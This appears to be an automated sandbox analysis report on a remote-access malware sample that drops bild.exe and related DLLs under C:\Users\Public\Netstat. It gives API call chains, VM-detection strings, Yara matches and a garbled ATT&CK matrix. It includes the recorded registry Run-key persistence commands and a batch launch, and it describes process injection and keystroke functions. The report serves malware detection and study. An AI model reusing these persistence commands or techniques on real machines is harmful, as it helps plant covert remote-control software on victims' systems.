                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,6_2_111266E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_1110AFD0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8C8D5 VirtualQuery,GetSystemInfo,0_2_00D8C8D5
                                Source: HTCTL32.DLL.0.drBinary or memory string: VMware
                                Source: bild.exe, 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claal*
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1708628358.000000000106B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                Source: HTCTL32.DLL.0.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.0.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: bild.exe, 0000000A.00000003.1907595344.000000000095F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1708628358.000000000106B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                Source: bild.exe, 00000005.00000002.4162765442.00000000056A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4161642806.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4161642806.0000000000BFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.0.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: TCCTL32.DLL.0.drBinary or memory string: VMWare
                                Source: bild.exe, 00000006.00000003.1826499959.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 0000000B.00000003.1988483840.0000000001130000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeAPI call chain: ExitProcess graph end nodegraph_0-22429
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_5-94341
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end nodegraph_5-94972
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\Public\Netstat\bild.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8DA75
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,5_2_11147750
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,5_2_11029590
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D94A5A mov eax, dword ptr fs:[00000030h]0_2_00D94A5A
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D98AAA GetProcessHeap,0_2_00D98AAA
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D8DA75
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8DBC3 SetUnhandledExceptionFilter,0_2_00D8DBC3
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D95B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D95B53
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D8DD7C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_11093080
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_110310C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11161D01
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116DD89
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5F28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_6C5F28E1
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5F87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_6C5F87F5
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_11093080
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_110310C0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11161D01
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1116DD89
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,5_2_110F4560
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,5_2_1111FCA0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exeJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,5_2_1109E190
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,5_2_1109E910
                                Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Shell_TrayWnd
                                Source: bild.exe, bild.exe, 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8D8CB cpuid 0_2_00D8D8CB
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00D8932F
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11173A35
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11173D69
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173CC6
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,5_2_1116B38E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11173933
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_111739DA
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_1117383E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173D2D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11173C06
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_6C60DC56
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_6C601CC1
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,5_2_6C60DC99
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_6C601DB6
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_6C601E5D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_6C601EB8
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,5_2_6C60DB7C
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_6C602089
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C602175
                                Source: C:\Users\Public\Netstat\bild.exeCode function: EnumSystemLocalesA,5_2_6C602151
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C6021DC
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_6C602218
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11173D69
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoA,6_2_1116B38E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_11173933
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_111739DA
                                Source: C:\Users\Public\Netstat\bild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_1117383E
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11173A35
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11173D2D
                                Source: C:\Users\Public\Netstat\bild.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_11173C06
                                Source: C:\Users\Public\Netstat\bild.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_11173CC6
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,5_2_110F33F0
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D8C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_00D8C131
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,5_2_1103B160
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_11174AE9
                                Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exeCode function: 0_2_00D7A8E0 GetVersionExW,0_2_00D7A8E0
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,5_2_110D8200
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 5_2_6C5DA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,5_2_6C5DA980
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_11070090
                                Source: C:\Users\Public\Netstat\bild.exeCode function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,6_2_110D8200
                                Source: Yara matchFile source: 6.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.6f980000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.6f980000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.6f980000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.6cef0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.6f980000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe.5322800.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.6cef0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.6c5d0000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.6cef0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.6cef0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.4b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 10.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1989203129.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1989168471.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.1987565229.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1988599605.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe PID: 7436, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7692, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 8120, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: bild.exe PID: 7176, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\bild.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                DLL Side-Loading                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		12
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		3
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		2
                                Valid Accounts                                		3
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts12
                                Command and Scripting Interpreter                                		2
                                Valid Accounts                                		21
                                Access Token Manipulation                                		2
                                Software Packing                                		Security Account Manager3
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		4
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Windows Service                                		1
                                Windows Service                                		1
                                DLL Side-Loading                                		NTDS44
